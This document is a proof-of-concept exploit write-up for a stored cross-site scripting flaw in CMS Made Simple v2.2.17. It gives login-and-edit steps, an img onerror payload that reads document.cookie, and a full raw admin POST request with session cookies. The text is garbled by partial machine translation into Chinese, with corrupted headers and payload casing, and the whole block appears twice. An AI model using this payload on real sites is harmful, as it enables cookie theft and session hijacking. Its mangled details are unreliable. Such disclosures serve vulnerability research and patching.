#Exploit title: cmsmadesimple v2.2.17-存储的跨站点脚本(XSS)
#application: cmsmadesimple
#版本: v2.2.17
#BUGS:存储的XSS
#Technology: PHP
#DENDOR URL: https://www.cmsmadesimple.org/
#software link: https://www.cmsmadesimple.org/downloads/cmsms
#date of uth: 12-07-2023
#作者:MirabbasAğalarov
#Tested On: Linux
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。去找内容经理
3。添加新内容
4。键入为'img src=x OneError=alert(document.cookie)'to Metadata部分
PAYLOAD: IMG SRC=X ONEERROR=alert(document.cookie)
5。提交内容
6。访问内容(http://localhost/index.php?page=test)
请求:
post/admin/moduleinterface.php?mact=cmscontentManager,m1_, admin_editcontent,0; __c=5c64b42fb42fb42c1d6bba6bba6bba6showtemplate=false http/1.1
HOST: LOCALHOST
内容长度: 584
SEC-CH-UA:
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: cmsSessID852A6E69CA02=G13P5UCAJC0V5TKER6IFDCASO5; 34A3083B62A2225EFA0BC6B5B433335D2226264C2C1=24F612918EB1C1E085BED5CAB8 2F2A786F45D5C%3A%3AEYJ1AWQIOJESINVZZXJUYW1LIJOIYWRTAW4ILCJLZMZFDWLKI jpudwxslcjlzmzfdxnlcm5hbwuiom51bgwsimhhc2gioiikmnkkmtaklndymkffznc4w tjlcwhhqvj2lndzt1fvy09htzmzevlnyzvdu1v5nnfrqkxkexjzjznuozstyifq%3D%3D; __C=5C64B42FB42C1D6BBA6
连接:关闭
MACT=CMSCONTENTMANAGER%2CM1_%2CADMIN_EDITCONTENT%2C0__C=5C64B42FB42C1D6BBA6BBA6M1_CONTENT_ID=0M1_ACTIVE_TAB=M1_CONTENT_TAB=M1_CONTENT_TYPE=contentTitle=contentTitle=tes tcontent_en=%3CP%3etest%3C%2FP%3emenutex=parent_id=-1showinMenu=0showinmenu=1titLeatTribute=AccessKey=accessKey=tabindex=tartex=target=----元数据=%=%3cimg +src%3DX +ONERROR%3DALERT(document.cookie)%3epageData=design_id=2template_id=10alias=10alias=active=0 active=0Active=1secure=1secure=0cachable=0cachable=0cachable=0cachable=1image=1image=thu mbnail=extra1=extra2=extra3=wandChildren=0wantsChildren=1searchable=0searchable=1disable_wysiwyg=0additional_editors=m1_ajax=1m1_apply=1
#application: cmsmadesimple
#版本: v2.2.17
#BUGS:存储的XSS
#Technology: PHP
#DENDOR URL: https://www.cmsmadesimple.org/
#software link: https://www.cmsmadesimple.org/downloads/cmsms
#date of uth: 12-07-2023
#作者:MirabbasAğalarov
#Tested On: Linux
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。去找内容经理
3。添加新内容
4。键入为'img src=x OneError=alert(document.cookie)'to Metadata部分
PAYLOAD: IMG SRC=X ONEERROR=alert(document.cookie)
5。提交内容
6。访问内容(http://localhost/index.php?page=test)
请求:
post/admin/moduleinterface.php?mact=cmscontentManager,m1_, admin_editcontent,0; __c=5c64b42fb42fb42c1d6bba6bba6bba6showtemplate=false http/1.1
HOST: LOCALHOST
内容长度: 584
SEC-CH-UA:
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: cmsSessID852A6E69CA02=G13P5UCAJC0V5TKER6IFDCASO5; 34A3083B62A2225EFA0BC6B5B433335D2226264C2C1=24F612918EB1C1E085BED5CAB8 2F2A786F45D5C%3A%3AEYJ1AWQIOJESINVZZXJUYW1LIJOIYWRTAW4ILCJLZMZFDWLKI jpudwxslcjlzmzfdxnlcm5hbwuiom51bgwsimhhc2gioiikmnkkmtaklndymkffznc4w tjlcwhhqvj2lndzt1fvy09htzmzevlnyzvdu1v5nnfrqkxkexjzjznuozstyifq%3D%3D; __C=5C64B42FB42C1D6BBA6
连接:关闭
MACT=CMSCONTENTMANAGER%2CM1_%2CADMIN_EDITCONTENT%2C0__C=5C64B42FB42C1D6BBA6BBA6M1_CONTENT_ID=0M1_ACTIVE_TAB=M1_CONTENT_TAB=M1_CONTENT_TYPE=contentTitle=contentTitle=tes tcontent_en=%3CP%3etest%3C%2FP%3emenutex=parent_id=-1showinMenu=0showinmenu=1titLeatTribute=AccessKey=accessKey=tabindex=tartex=target=----元数据=%=%3cimg +src%3DX +ONERROR%3DALERT(document.cookie)%3epageData=design_id=2template_id=10alias=10alias=active=0 active=0Active=1secure=1secure=0cachable=0cachable=0cachable=0cachable=1image=1image=thu mbnail=extra1=extra2=extra3=wandChildren=0wantsChildren=1searchable=0searchable=1disable_wysiwyg=0additional_editors=m1_ajax=1m1_apply=1